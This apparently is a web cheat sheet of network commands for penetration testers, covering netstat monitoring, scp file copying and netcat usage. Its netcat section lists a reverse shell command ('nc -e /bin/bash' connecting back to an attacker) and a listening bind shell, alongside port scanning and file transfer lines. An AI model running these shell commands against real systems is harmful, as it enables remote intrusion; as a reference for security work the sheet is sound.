The Hacker's Cheat Sheet to Essential Network Commands
hackersnetwork commandssecurity tools
NETSTAT
Basic Commands
- netstat -a # Show all connections and listening ports
- netstat -n # Display addresses/ports numerically
- netstat -b # Show executable involved (Windows admin)
- netstat -o # Display process IDs
TCP Commands
- netstat -at # Displays all active TCP connections
- netstat -t # Shows TCP connections with state information
- netstat -atnp # Lists all TCP connections with process IDs
- netstat -s -p tcp # Displays TCP protocol-specific statistics
- netstat -lt # Shows listening TCP ports
UDP Commands
- netstat -au # Displays all active UDP connections
- netstat -u # Shows UDP connections with state information
- netstat -aunp # Lists all UDP connections with process IDs
- netstat -s -p udp # Displays UDP protocol-specific statistics
- netstat -lu # Shows listening UDP ports
Security Commands
- netstat -n # Displays numerical IP addresses, bypassing DNS resolution for security
- netstat -p # Shows the PID and name of the program to which each socket belongs
- netstat -e # Displays Ethernet statistics, useful for monitoring local network security
- netstat -g # Lists multicast group memberships for monitoring secure network communications
- netstat -antup # Show all connections with processes
- netstat -tlpn | grep "LISTEN" | grep -v "127.0.0.1" # Find suspicious LISTENING ports
- netstat -ant | awk '{print $5}' | grep -v "^$" | cut -d: -f1 | sort | uniq -c | sort -nr | head -n 10 # Check for possible port scans
- netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n # Count connections per IP
- netstat -ant | awk '{print $6}' | sort | uniq -c # Monitor connection stats
Real-time Monitoring
- netstat -ant 5 # Update every 5 seconds
- watch "netstat -an | grep ':80 '" # Watch specific port (80)
- watch -n1 'netstat -ant | grep -c ESTABLISHED' # Watch number of established connections
- watch -n1 'netstat -ant | grep -c SYN' # Watch number of SYN connections
Statistics and Performance
Interfacestats
- netstat -s # Protocol statistics
- netstat -i # Show interface statistics
- netstat --statistics --raw # Display raw IP statistics
- netstat -m # Memory buffer usage
Routing Information
- netstat -rn # Numeric routing table
- netstat -r # Show routing table
### Privileges
Many commands require root/administrator access. Use sudo on Linux/Unix systems and run as Administrator on Windows.
### Performance
The -n flag speeds up output by skipping DNS resolution. Continuous monitoring can be resource-intensive, so use grep/findstr for filtering large outputs.
### Cross-Platform
Replace grep with findstr on Windows, as some options are not available on all systems. Syntax may also vary between Unix distributions.
### Best Practices
Always use -n for scripts and combine with watch or task scheduler for monitoring. Additionally, pipe to text processing tools for complex analysis.
SCP
Commands
- scp file.txt user@192.168.1.1:/path/to/destination # Copy file to remote host
- scp -r /local/directory user@192.168.1.1:/path/to/destination # Copy directory to remote host
- scp -P 2222 file.txt user@192.168.1.1:/path/to/destination # Copy file using a different port
Options and Flags
- -P port # Specify the port to connect to on the remote host
- -i keyfile # Identity file for SSH authentication
- -v # Verbose mode; for debugging and information
- -C # Enable compression
- -q # Quiet mode; suppresses the progress meter
- -o option # Pass options to ssh in the form of key=value
Copying from Local to Remote
- scp localfile.txt user@remote_host:/path/to/destination/ # Copy a file from local to remote
- scp -r local_directory user@remote_host:/path/to/destination/ # Copy a directory from local to remote
Specifying Ports
- scp -P 2222 localfile.txt user@remote_host:/path/to/destination/ # Specify a custom port (e.g., 2222)
Using Identity Files
- scp -i /path/to/private_key.pem localfile.txt user@remote_host:/path/to/destination/ # Use a specific SSH private key for authentication
Advanced Options
- scp -C localfile.txt user@remote_host:/path/to/destination/ # Enable compression during transfer
- scp -v localfile.txt user@remote_host:/path/to/destination/ # Verbose mode for debugging
Best Practices for Penetration Testers
- Use `-C` to enable compression for faster transfers when dealing with large files.
- Use `-v` to enable verbose output to troubleshoot connection issues.
- Always ensure the integrity and confidentiality of files during transfer, especially when handling sensitive data.
- Use specific ports or identity files to align with organizational policies or for added security.
NETCAT
Basic Commands
- nc -l -p <port> # Listen for incoming connections on the specified TCP port
- nc -u -l -p <port> # Listen for incoming UDP packets on the specified port
- nc -v <hostname> <port> # Connect to a specified host on a specified TCP port with verbose output
- nc -u -v <hostname> <port> # Send/receive UDP packets to/from a specified host with verbose output
- nc -z -v <hostname> <port_range> # Scan a range of ports to check for open connections
Data Transfer
- nc -l -p <port> > received_file # Receive data and save it to a file on a specified port
- nc <hostname> <port> < file_to_send # Send a file to a remote host on a specified port
- nc -v -l -p <port> | tar xvf - # Receive a tar file over TCP and extract it in real-time
Reverse Shells (Use with Caution)
- nc -e /bin/bash <hostname> <port> # Create a reverse shell to connect back to an attacker
- nc -l -p <port> -e /bin/bash # Set up a listening shell that can be accessed remotely
Advanced Features
- nc -n -v <hostname> <port> # Connect to a host using numeric IP addresses only (no DNS resolution)
- nc -vv <hostname> <port> # Connect with very verbose output for debugging
- nc -l -p <port> -s <IP> # Listen on a specific IP address (useful for multi-homed systems)
- nc -w <timeout> <hostname> <port> # Set a timeout for the connection (in seconds)
Options and Flags
- -l # Listen mode (wait for incoming connections)
- -p <port> # Specify the port to listen on or connect to
- -v # Enable verbose output for debugging
- -u # Enable UDP mode for sending and receiving packets
- -z # Zero-I/O mode for scanning without sending data
- -n # Numeric-only IP addresses (skip DNS resolution)
- -e <cmd> # Execute a command after establishing a connection
- -w <timeout> # Set a timeout for connects and sends (in seconds)
- -s <IP> # Bind to a specific source IP address